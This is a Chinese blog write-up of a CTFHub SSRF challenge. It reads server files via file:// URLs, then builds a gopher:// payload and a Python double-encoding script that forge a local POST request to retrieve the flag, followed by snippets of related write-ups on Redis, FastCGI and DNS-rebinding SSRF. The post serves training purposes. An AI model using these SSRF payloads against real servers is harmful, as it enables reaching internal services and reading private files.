ctfhub-web-ssrf-post请求 解题思路(gopher伪协议应用)

最新推荐文章于 2025-03-09 16:33:47 发布
最新推荐文章于 2025-03-09 16:33:47 发布
阅读量780 收藏 6
点赞数 16
文章标签: 前端 android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_80307383/article/details/140621499
版权

1.打开题目首先输入url=127.0.0.1/flag.php进行测试,查看源码后发现给出一个key值

将key值输入该页面给出的输入框后,提示只能从127.0.0.1进行访问

2.接着访问flag.php,index.php的源代码

通过file伪协议

file:///var/www/html/flag.php

file:///var/www/html/index.php

//flag.php源码加注释(源码不带)
<?php

error_reporting(0);//禁用所有错误报告,这意味着PHP将不会显示任何警告或错误信息。

if ($_SERVER["REMOTE_ADDR"] != "127.0.0.1") {
    echo "Just View From 127.0.0.1";
    return;
}//这检查请求是否来自本地地址127.0.0.1。如果不是,将显示消息“Just View From 127.0.0.1”并终止脚本执行。

$flag=getenv("CTFHUB");//获取环境变量
$key = md5($flag);//加密

if (isset($_POST["key"]) && $_POST["key"] == $key) {
    echo $flag;
    exit;
}//验证key成功则得到flag
?>

<form action="/flag.php" method="post">
<input type="text" name="key">
<!-- Debug: key=<?php echo $key;?>-->
</form>
//index.php源码

<?php

// 关闭所有错误报告
error_reporting(0);

// 检查是否有 'url' 参数被传递到脚本中
if (!isset($_REQUEST['url'])) {
    // 如果没有 'url' 参数,重定向到根目录,并添加查询字符串 '?url=_'
    header("Location: /?url=_");
    exit;
}

// 初始化cURL会话
$ch = curl_init();

// 设置cURL的目标URL,使用传入的 'url' 参数
curl_setopt($ch, CURLOPT_URL, $_REQUEST['url']);

// 设置cURL选项,告诉cURL不返回HTTP头,只返回正文内容
curl_setopt($ch, CURLOPT_HEADER, 0);

// 设置cURL选项,允许cURL跟随重定向
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);

// 执行cURL请求
curl_exec($ch);

// 关闭cURL会话
curl_close($ch);
?>

构造gopher伪协议,使得在index页面提交带key的post请求以得到flag,注意换行符

gopher://127.0.0.1:80/_

POST /flag.php HTTP/1.1
Host: 127.0.0.1:80
Content-Length: 36
Content-Type: application/x-www-form-urlencoded

key=80da6951bda80138fa19edbc41ff2960

构造好之后放入bp编码

但是使用bp的url编码得不到本题flag,只有用脚本的url编码才能得到flag(不理解,望有高人指点)

脚本附上

import urllib.parse
payload =\
"""
POST /flag.php HTTP/1.1
Host: 127.0.0.1:80
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

key=80da6951bda80138fa19edbc41ff2960
"""


tmp = urllib.parse.quote(payload)
new = tmp.replace('%0A','%0D%0A')
result = 'gopher://127.0.0.1:80/'+'_'+new
result = urllib.parse.quote(result)
print(result)

在cmd里运行,位置自选,我的在桌面

CTFhub-ssrf-POST请求
qq_51553814的博客
08-11 4224
CTFhub-ssrf-POST请求 解题 进入靶场,首先看到的是一片空白,没有任何返回,甚至看源码里面也没有任何东西 使用dirsearch扫描,扫出了一个文件/index.php 还有一个flag.php,我是在网上看WP才知道有这个文件,看了很多篇WP都没有说这个文件怎么来的,只是直接说发现了这个文件 现在先来看一看这两个文件吧 首先是flag.php文件,我们让url=127.0.0.1/flag.php,通过内网来访问就能直接访问到了,访问后是一个方框 再看源码发现,需要用post传输一个key
CTFHub-Web-SSRF解题过程
2401_86440467的博客
08-10 1970
开启环境访问后,url=后添加如下,得到flag。
Ctfhub-POST请求
鸣蜩十四的博客
08-09 3447
在题目中的环境初始链接为:http://challenge-fc6097d3c4b542ee.sandbox.ctfhub.com:10800/?url=_ 我们先用file://协议对index.php页面源码进行读取,http://challenge-fc6097d3c4b542ee.sandbox.ctfhub.com:10800/?url=file:///var/www/html/index.php,然后发现有一个/flag.php的页面,然后同样对其源码进行读取 得到index.php的页面源码如
CTFHubPOST请求
最新发布
2301_78554096的博客
03-09 328
CTFHubPOST请求
CTFHUB-POST请求
Dug123456_的博客
04-11 1301
定义:Gopher是Internet上一个非常有名的信息查找系统,它将Internet上的文件组织成某种索引,很方便地将用户从Internet的一处带到另一处。在WWW出现之前,Gopher是Internet上最主要的信息检索工具,Gopher站点也是最主要的站点,使用tcp70端口。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它;gopher协议支持发出GET、POST请求:可以先截获get请求包和post请求包,在构成符合gopher协议的请求
CTFHUB-WEB-POST请求
carrot11223的博客
10-27 268
可以知道访问这个文件的时候,我们需要从127.0.0.1的地址进入,然后同时提交一个key,才可以输出$flag,但问题是我们怎么从本地换回地址进入呢,想了想试试XFF,不行,那就上网搜,然后找到一个协议gopher,它可以确保从127.0.0.1去发送,这个协议有一个具体的格式,url=gopher://127.0.0.1:80/_POST要发送的数据。运行python 1.py,直接替换,文件目录如下,将要替换的内容放到url…进行编码的时候也要注意了,第一次选1,第二次选2。
CTFHUB_SSRF_POST请求
m0_58788294的博客
07-29 332
【代码】CTFHUB_SSRF_POST请求
CTFHUB--SSRF(中)--FastCGI协议\Redis协议 以及gopherus工具攻击
qq_75120258的博客
03-29 2686
本来我们可以执行任意文件,但是在FPM某个版本之后,增加了security.limit_extensions选项,限定了只有某些后缀的文件允许被fpm执行,默认是.php,所以现在要使用这个漏洞,我们得先知道服务器上的一个php文件,假设我们爆破不出来目标环境的web目录,我们可以找找默认源安装后可能存在的php文件,比如/usr/local/lib/php/PEAR.php。FastCGI是一个常驻型的CGI,它在服务器启动的时候先启动一个应用程序池,然后由这个应用程序池来管理和调度应用程序的执行。
CTFHub技能树 Web-SSRF篇(保姆级通过全攻略)
2301_76631050的博客
07-24 1091
要完成DNS重绑定攻击,我们需要一个域名,并且将这个域名的解析指定到我们自己的DNS Serve在我们的可控的DNS Server上编写解析服务,设置TTL时间为0,这是为了防止有DNS服务器对解析结果进行缓存。步骤三:将HTTP头部的Host字段修改为127.0.0.1:80然后就是老操作... url编码一次在把%0A换成 %0D%0A 并且末尾要加上%0D%0A,然后再对url进行第二次编码....如下。步骤三:将其中的%0A 替换成%0D%0A 并且末尾要加上%0D%0A。
CTFHUB-WEB-SSRF【11】POST请求 上传文件 FastCGI协议 Redis协议
(∪.∪ )...zzz的博客
06-13 1041
!!!POST请求试一下`?url=file:///var/www/html/flag.php`根据提示从127.0.0.1 访问给服务器发送一个KEY,写POST包上传文件FastCGI协议Redis协议 POST请求 试一下?url=file:///var/www/html/flag.php 根据提示从127.0.0.1 访问 给服务器发送一个KEY,写POST包 <!-- Debug: key=a977f452523073d3d7d2fd8bd41b5331--> 这个是基础po
CTFHub技能树 Web-SSRF系列通过全技巧(已完结)
m0_59151303的博客
07-24 1413
第二步:选择一个文件上传,点击提交查询并用Burp Suite抓包,修改包内容,右击发送到Reperter,打开重放器,发现有中文乱码,修改中文乱码为“提交“,点击发送,发现Content-Length:的长度改变。第三步:用在线工具对修改后包进行URL编码,将编码后内容的%0A替换成%0D%0A并且在末尾再加一个%0D%0A,对替换后的内容再进行URL编码。第三步:用在线工具进行URL编码,将编码后内容的%0A替换成%0D%0A并且在末尾再加一个%0D%0A,对替换后的内容再进行URL编码。
CTFHUB-SSRF-POST请求
weixin_68416970的博客
06-22 709
CTFHUB靶场技能树-SSRF-POST请求的通关教程
ctfhub-web-ssrf-POST请求
m0_52484587的博客
08-29 1118
在使用 Gopher协议发送 POST请求包时,Host、Content-Type和Content-Length请求头是必不可少的,但在 GET请求中可以没有。在向服务器发送请求时,首先浏览器会进行一次 URL解码,其次服务器收到请求后,在执行curl功能时,进行第二次 URL解码。这次是发一个HTTP POST请求.对了.ssrf是用php的curl实现的.并且会跟踪302跳转.加油吧骚年。我们尝试通过file协议读取index.php 和flag.php的页面源码。发送POST请求,得到flag。
CTFHub技能树笔记之SSRFPOST请求、文件上传
weixin_48799157的博客
04-03 9493
知识点: 1.什么是gopher协议 1.Gopher协议是一种信息查找系统,他将Internet上的文件组织成某种索引,方便用户从Internet的一处带到另一处。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它。 2.它只支持文本,不支持图像 3.Gopher 协议可以做很多事情,特别是在 SSRF 中可以发挥很多重要的作用。利用此协议可以攻击内网的 FTP、Telnet、Redis、Memcache,也可以进行 GET、POST 请求。 2.gopher使用结
CTFHub-SSRF---(Post请求/上传文件/FastCGI/Redis/URL/数字IP/302跳转/DNS重绑定 Bypass)
Wking
08-17 3216
SSRF相关题目实战
CTFHUB POST
山兔的博客
09-12 881
一、POST 这次是发一个HTTP POST请求。对了.ssrf是用php的curl实现的,并且会跟踪302跳转.加油吧骚年。 1.什么是gopher协议 Gopher是Internet上一个信息查找系统,它将Internet上的文件组织成某种索引,方便用户从Internet的一处带到另一处。在WWW出现之前,Gopher是Internet上最主要的信息检索工具。使用tcp70端口。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它;gopher协议支持发出GET、POST请求
CTFHUB--SRRF(上)--gopher协议
qq_75120258的博客
03-28 1092
SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)
HTTP 请求方法
weixin_40910372的博客
07-02 507
HTTP 请求方法 根据 HTTP 标准,HTTP 请求可以使用多种请求方法。 HTTP1.0 定义了三种请求方法: GET, POST 和 HEAD方法。 HTTP1.1 新增了五种请求方法:OPTIONS、PUT、PATCH、DELETE、TRACE 和 CONNECT 方法。 序号 方法 描述 1 GET 请求指定的页面信息,并返回实体主体。 2 ...
CTFHubWEBSSRF(前四关)--内网访问、伪协议读取文件、端口扫描、post请求
weixin_57240513的博客
07-24 574
配置好后开始攻击,根据长度不同查看到端口为8965端口已经查出但是请求错误,怀疑是dirt://不可用然后改成http://后,成功拿到。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值